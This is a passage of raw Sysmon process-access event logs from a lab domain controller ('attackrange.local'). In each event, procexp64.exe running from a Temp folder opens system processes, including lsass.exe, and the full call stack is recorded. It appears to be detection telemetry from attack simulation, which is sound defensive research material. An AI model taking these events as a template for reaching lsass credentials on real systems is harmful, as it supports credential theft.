l+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788347Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788346Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788345Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788344Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788343Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788342Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788341Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788340Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788339Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788338Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788337Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788336Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788335Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788334Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788333Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788332Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788331Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788330Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5